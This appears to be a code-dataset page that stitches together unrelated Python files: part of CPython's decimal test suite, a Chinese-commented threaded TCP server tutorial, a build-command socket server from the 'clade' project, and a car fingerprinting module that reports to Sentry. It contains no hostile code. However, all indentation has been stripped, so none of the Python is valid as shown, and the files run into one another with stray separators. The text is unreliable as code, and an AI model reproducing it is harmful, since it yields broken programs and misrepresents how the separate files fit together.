# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
@cpython_only
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
def test_main(arith=False, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith or is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
tcp_server_3.py
|
import socket
import threading
# 处理客户端的请求操作
def handle_client_request(service_client_socket, ip_port):
# 循环接收客户端发送的数据
while True:
# 接收客户端发送的数据
recv_data = service_client_socket.recv(1024)
# 容器类型判断是否有数据可以直接使用if语句进行判断,如果容器类型里面有数据表示条件成立,否则条件失败
# 容器类型: 列表、字典、元组、字符串、set、range、二进制数据
if recv_data:
print(recv_data.decode("gbk"), ip_port)
# 回复
service_client_socket.send("ok,问题正在处理中...".encode("gbk"))
else:
print("客户端下线了:", ip_port)
break
# 终止和客户端进行通信
service_client_socket.close()
if __name__ == '__main__':
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
# 绑定端口号
tcp_server_socket.bind(("", 9000))
# 设置监听, listen后的套接字是被动套接字,只负责接收客户端的连接请求
tcp_server_socket.listen(128)
# 循环等待接收客户端的连接请求
while True:
# 等待接收客户端的连接请求
service_client_socket, ip_port = tcp_server_socket.accept()
print("客户端连接成功:", ip_port)
# 当客户端和服务端建立连接成功以后,需要创建一个子线程,不同子线程负责接收不同客户端的消息
sub_thread = threading.Thread(target=handle_client_request, args=(service_client_socket, ip_port))
# 设置守护主线程
sub_thread.setDaemon(True)
# 启动子线程r
sub_thread.start()
# tcp服务端套接字可以不需要关闭,因为服务端程序需要一直运行
# tcp_server_socket.close()
|
server.py
|
# Copyright (c) 2018 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import threading
import os
import socketserver
import sys
import tempfile
from clade.utils import get_logger
from clade.extensions.abstract import Extension
from clade.cmds import split_cmd, join_cmd
if sys.platform == "linux" or sys.platform == "darwin":
parent = socketserver.UnixStreamServer
else:
parent = socketserver.TCPServer
# Forking and threading versions can be created using
# the ForkingMixIn and ThreadingMixIn mix-in classes.
# For instance, a forking CladeSocketServer class is created as follows:
# class SocketServer(ForkingMixIn, parent):
class SocketServer(parent):
class RequestHandler(socketserver.StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip().decode("utf-8")
cmd = split_cmd(data)
for ext in self.extensions:
ext.preprocess(cmd)
data = join_cmd(cmd)
with open(self.output, "a") as clade_fh:
clade_fh.write(data + "\n")
def __init__(self, address, output, conf):
self.process = None
# Variable to store file object of UNIX socket parent directory
self.socket_fh = None
rh = SocketServer.RequestHandler
rh.output = output
# Request handler must have access to extensions
extensions = []
for cls in Extension.get_all_extensions():
extensions.append(cls(conf.get("work_dir", "Clade"), conf))
rh.extensions = extensions
super().__init__(address, rh)
def start(self):
if sys.platform == "win32" or (sys.platform == "darwin" and sys.version_info[1] >= 8):
self.process = threading.Thread(target=self.serve_forever)
else:
self.process = multiprocessing.Process(target=self.serve_forever)
self.process.daemon = True
self.process.start()
def terminate(self):
# if UNIX socket was used, it's parent directory needs to be closed
if self.socket_fh:
self.socket_fh.close()
class PreprocessServer:
def __init__(self, conf, output):
self.conf = conf
self.output = output
self.logger = get_logger("Server", conf=self.conf)
self.server = self.__prepare()
self.env = self.__setup_env()
def __prepare(self):
if sys.platform == "linux" or sys.platform == "darwin":
self.logger.debug("UNIX socket will be used")
server = self.__prepare_unix()
else:
self.logger.debug("INET socket will be used")
server = self.__prepare_inet()
return server
def __prepare_unix(self):
# Create temporary directory with random name to store UNIX socket
f = tempfile.TemporaryDirectory()
name = os.path.join(f.name, "clade.sock")
self.conf["Server.address"] = name
server = SocketServer(name, self.output, self.conf)
# Without this file object will be closed automatically after exiting from this function
server.sock_fh = f
return server
def __prepare_inet(self):
self.conf["Server.host"] = self.conf.get("Server.host", "localhost")
self.conf["Server.port"] = self.conf.get("Server.port", "0")
server = SocketServer(
(self.conf["Server.host"], int(self.conf["Server.port"])),
self.output,
self.conf,
)
# If "Server.port" is 0, than dynamic port assignment is used and the value needs to be updated
self.conf["Server.port"] = str(server.server_address[1])
return server
def __setup_env(self):
env = os.environ.copy()
# Windows doesn't support UNIX sockets
if sys.platform == "linux" or sys.platform == "darwin":
env.update({"CLADE_UNIX_ADDRESS": self.conf["Server.address"]})
else:
env.update({"CLADE_INET_HOST": self.conf["Server.host"]})
env.update({"CLADE_INET_PORT": self.conf["Server.port"]})
env.update({"CLADE_PREPROCESS": "true"})
return env
def start(self):
# Create separate server process
self.server.start()
def terminate(self):
self.server.terminate()
|
car_helpers.py
|
import os
import threading
import requests
from common.params import Params, put_nonblocking
from common.basedir import BASEDIR
from selfdrive.version import comma_remote, tested_branch
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_known_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
from selfdrive.car import gen_empty_fingerprint
from cereal import car
from common.travis_checker import travis
if not travis:
import selfdrive.crash as crash
EventName = car.CarEvent.EventName
def get_startup_event(car_recognized, controller_available):
if comma_remote and tested_branch:
event = EventName.startup
else:
event = EventName.startupMaster
if not car_recognized:
event = EventName.startupNoCar
elif car_recognized and not controller_available:
event = EventName.startupNoControl
return event
def get_one_can(logcan):
while True:
can = messaging.recv_one_retry(logcan)
if len(can.can) > 0:
return can
def load_interfaces(brand_names):
ret = {}
for brand_name in brand_names:
path = ('selfdrive.car.%s' % brand_name)
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
# read all the folders in selfdrive/car and return a dict where:
# - keys are all the car names that which we have an interface for
# - values are lists of spefic car models for a given car
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__('selfdrive.car.%s.values' % brand_name, fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, IOError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
def only_toyota_left(candidate_cars):
return all(("TOYOTA" in c or "LEXUS" in c) for c in candidate_cars) and len(candidate_cars) > 0
# **** for use live only ****
def fingerprint(logcan, sendcan, has_relay):
params = Params()
car_selected = params.get('dp_car_selected', encoding='utf8')
car_detected = params.get('dp_car_detected', encoding='utf8')
cached_params = params.get("CarParamsCache")
if cached_params is None and car_selected == "" and car_detected != "":
params.put('dp_car_selected', car_detected)
params.put('dp_car_detected', "")
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
if fixed_fingerprint == "" and cached_params is None and car_selected != "":
fixed_fingerprint = car_selected
skip_fw_query = os.environ.get('SKIP_FW_QUERY', False)
if has_relay and not fixed_fingerprint and not skip_fw_query:
# Vin query only reliably works thorugh OBDII
bus = 1
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin is not VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
fw_candidates, car_fw = set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_known_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
while not done:
a = get_one_can(logcan)
for can in a.can:
# need to independently try to fingerprint both bus 0 and 1 to work
# for the combo black_panda and honda_bosch. Ignore extended messages
# and VIN query response.
# Include bus 2 for toyotas to disambiguate cars using camera messages
# (ideally should be done for all cars but we can't for Honda Bosch)
if can.src in range(0, 4):
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
if (can.src == b or (only_toyota_left(candidate_cars[b]) and can.src == 2)) and \
can.address < 0x800 and can.address not in [0x7df, 0x7e0, 0x7e8]:
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
# Toyota needs higher time to fingerprint, since DSU does not broadcast immediately
if only_toyota_left(candidate_cars[b]):
frame_fingerprint = 100 # 1s
if len(candidate_cars[b]) == 1 and frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
elif len(candidate_cars[b]) < 4: # For the RAV4 2019 and Corolla 2020 LE Fingerprint problem
if frame > 180:
if any(("TOYOTA COROLLA TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA TSS2 2019"
if any(("TOYOTA COROLLA HYBRID TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA HYBRID TSS2 2019"
if any(("TOYOTA PRIUS 2017" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA PRIUS 2017"
# bail if no cars left or we've been waiting for more than 2s
failed = all(len(cc) == 0 for cc in candidate_cars.values()) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
if fixed_fingerprint:
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.warning("fingerprinted %s", car_fingerprint)
put_nonblocking('dp_car_detected', car_fingerprint)
return car_fingerprint, finger, vin, car_fw, source
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
except Exception:
return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
crash.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
crash.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
crash.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan, has_relay=False):
candidate, fingerprints, vin, car_fw, source = fingerprint(logcan, sendcan, has_relay)
if candidate is None:
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
if not travis:
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
if not travis:
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, has_relay, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
return CarInterface(car_params, CarController, CarState), car_params
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.